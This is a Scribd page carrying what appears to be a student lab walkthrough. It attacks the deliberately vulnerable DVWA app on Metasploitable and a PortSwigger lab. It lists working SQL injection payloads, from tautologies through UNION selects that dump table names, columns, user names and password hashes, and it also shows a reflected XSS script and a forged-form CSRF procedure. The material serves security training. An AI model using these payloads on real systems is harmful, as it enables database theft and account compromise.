Scribd
Upload
11 views

Example 1

Uploaded by

Levi
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
11 views

Example 1

Uploaded by

Levi
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 14

SQL Injection and scripting attack using DVWA and

Metasploitable
Steps:
1. First you need to download Metasploitable in your VM from this following link
https://information.rapid7.com/download-metasploitable-2017-thanks.html

It can be used as a server in your VM to practice your hacking skills.

2. Unzip the file and the system in which you have VMware installed open the following file and it will
give you option of opening it in which application choose the VMware and it will create new
machine.
3. Now you power on the Metasploitable and it will check some settings and the following should be
visible to you at the end. Now you can put in username and password as msfadmin.

4. After logging in you can get the IP address of the server by the command of ifconfig and the following
info should be shown. Get the inet address which is in my case is 192.168.24.130

5. Now open this IP in your VM machine which is in my case is Kali Linux and the Metasploitable page
should be visible to you from there you need to press on DVWA to go DVWA login page.
6. Login using default credentials as username: Admin and Password: password. Then in security you
can set the level of security from high to low in our case we set it to low.
7. Now you can go to SQL injection tab and start doing the attack as follows.

If you write 1 in the text box, you will get the information of ID: 1 stored in database.

If you write 2 in the text box, you will get the information of ID: 2 stored in database.

If you write 1’ in the text box, you will get an error.


If you write 1’ or 1 = 1# in the text box, you will get the information of every ID stored in database.

If you write 1’ order by 3# in the text box, you will get an error.

If you write 1’ order by 2# in the text box, it will show you result as there are only 2 columns in database.
If you write %' or '0'='0 in the text box, it will show you all false and true records in database.

If you write %' or 0=0 union select null, version() # in the text box, it will show you database version type.

If you write %' or 0=0 union select null, user() # in the text box, it will show you database username.
If you write %' or 0=0 union select null, database() # in the text box, it will show you database name.

If you write %' and 1=0 union select null, table_name from information_schema.tables # in the text box,
it will show you all tables in information schema.
If you write %' and 1=0 union select null, concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' # in the text box, it will show you all column
fields in information schema.

If you write %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)


from users # in the text box, it will show you all column fields contents in information schema.
8. Now we will try one cross site scripting attack by going XSS reflected tab and as follows.

If you write Type <script>alert(‘XSS ATTACK (ANS TRUST)’)<script/>, it will display the following.

9. CSRF on DVWA, go to CSRF tab on DVWA site and change the password.

10. Logout and login with the new password.


11. By right clicking on blank space in CSRF tab, you will see view source page option click it.

12. Copy the selected form from and paste it in your windows notepad and save file as .html.

13. Now make the following changes in the html file that you just saved by opening it in notepad.

Make sure the IP you input in file is the one given to you by Metasploitable.
14. Now open the file this will be displayed to you and when you press change you will be redirected to
DVWA and when you enter your credentials, It will show you login failed as you got attacked.

15. Open Burp Suite and set up its proxy settings on your Mozilla using the foxy proxy extension to see
burp proxy settings go to as following.
16. Then put this information in the foxy proxy extension.

17. Then switch to burp suite proxy that you created and open the port swigger site to do the following
lab https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

18. Start by accessing the lab and you will see in burp suite https history that you it is recording the
website that you’re visiting or visited.
19. Put the intercept on in burp suite and go gift section on the website and burp suite will open the
packet information then make the following changes in category.
20. Then forward the packet and the following should be shown to you and lab would be seen as solved.

You might also like